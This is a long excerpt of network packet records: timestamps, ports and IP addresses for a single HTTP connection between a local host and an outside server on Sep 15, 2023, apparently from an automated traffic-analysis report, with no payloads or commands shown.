Sep 15, 2023 11:23:55.851883888 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.851918936 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.851974964 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852016926 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852034092 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852050066 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852082014 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852112055 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852143049 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852173090 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852173090 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852173090 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852205038 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852205038 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852205038 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852262020 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852293968 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852317095 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852324963 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852348089 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852355003 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852376938 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852411032 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852432013 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852463961 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852487087 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852494001 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852513075 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852524996 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852547884 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852555990 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852586031 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.852596045 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852636099 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.852648973 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.894447088 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.894517899 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.894520044 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.894582987 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.949075937 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949139118 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949173927 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949208021 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949207067 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.949239016 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949270010 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949301958 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949331999 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949362993 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949394941 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949424982 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949425936 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.949425936 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.949459076 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949461937 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.949496031 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949505091 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.949527025 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949557066 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949578047 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.949588060 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949618101 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949645996 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.949647903 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949680090 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949712992 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949724913 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.949743032 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949774027 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949790955 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.949865103 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.949892998 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949927092 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.949975967 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.950006008 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950037003 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950037956 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.950109959 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950113058 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.950181007 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950232983 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.950252056 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950284004 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950315952 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950347900 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950360060 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.950378895 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950409889 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950442076 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950445890 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.950473070 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950503111 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950530052 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.950532913 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950588942 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.950651884 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.950731039 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950762033 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950814009 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.950872898 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.950912952 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950944901 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950975895 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.950997114 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951008081 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951071024 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951118946 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951124907 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951152086 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951230049 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951261997 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951292992 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951323986 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951344967 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951354027 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951411963 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951426029 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951456070 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951477051 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951527119 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951560020 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951600075 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951615095 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951631069 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951662064 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951677084 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951692104 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951756954 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951764107 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951795101 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951813936 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951824903 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951855898 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951888084 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951894045 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.951958895 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.951961994 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.952024937 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:55.985821009 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.985871077 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.985891104 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.985907078 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:55.986047983 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.040757895 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.040818930 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.040855885 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.040870905 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.040891886 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.040914059 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.040929079 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.040946960 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.041016102 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.041074991 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.041306973 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.041340113 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.041373014 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.041403055 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.041579008 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.041630030 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.041651964 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.041707993 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.041723967 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.041779995 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.041795015 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.041851044 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.041867971 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.041901112 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.041918039 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.041951895 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.042139053 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.042201042 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.042875051 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.042965889 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.044748068 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.044765949 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.044797897 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.044812918 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.044846058 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.044938087 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.044994116 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045593977 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045629978 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045664072 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045666933 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045695066 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045701027 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045726061 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045727015 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045753956 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045758009 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045782089 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045789003 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045809984 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045820951 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045835972 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045852900 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045875072 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045886993 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045902014 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045917988 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045933962 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045948029 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045965910 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.045978069 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.045998096 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046010017 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046025038 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046041012 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046072960 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046075106 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046103954 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046113968 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046135902 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046139956 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046166897 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046175957 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046195984 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046200037 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046224117 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046226978 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046251059 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046257973 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046279907 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046288013 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046313047 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046319008 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046341896 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046349049 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046375990 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046379089 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046410084 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046416044 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046431065 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046441078 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046468019 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046471119 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046493053 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046503067 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046525955 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046535015 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046561003 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046567917 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046592951 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046600103 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046637058 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046653032 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046669006 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046684980 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046715021 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046715975 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046741962 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046746016 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046777010 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046789885 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046808004 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046814919 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046838045 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046839952 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046855927 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046869040 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046895981 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046902895 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046930075 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046933889 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046955109 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046967030 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.046988010 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.046997070 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047017097 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047028065 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047049999 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047058105 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047084093 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047089100 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047110081 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047120094 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047144890 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047149897 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047177076 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047182083 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047209978 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047211885 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047234058 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047243118 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047265053 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047274113 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047297955 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047305107 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047326088 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047334909 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047358990 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047365904 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047386885 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047395945 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047419071 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047425985 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047452927 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047456026 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047478914 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047487020 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047508955 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047518015 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047542095 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047549963 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047576904 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047580957 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047597885 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047616005 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047641993 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047646999 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047667027 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047677994 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047693014 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047712088 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047734022 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047744989 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047765017 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047775030 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047806025 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047812939 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047837019 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047851086 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047868967 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047874928 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047900915 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047900915 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047921896 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047931910 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047950983 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047964096 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.047987938 CEST	49762	80	192.168.2.5	172.67.139.34
Sep 15, 2023 11:23:56.047992945 CEST	80	49762	172.67.139.34	192.168.2.5
Sep 15, 2023 11:23:56.048021078 CEST	49762	80	192.168.2.5	172.67.139.34
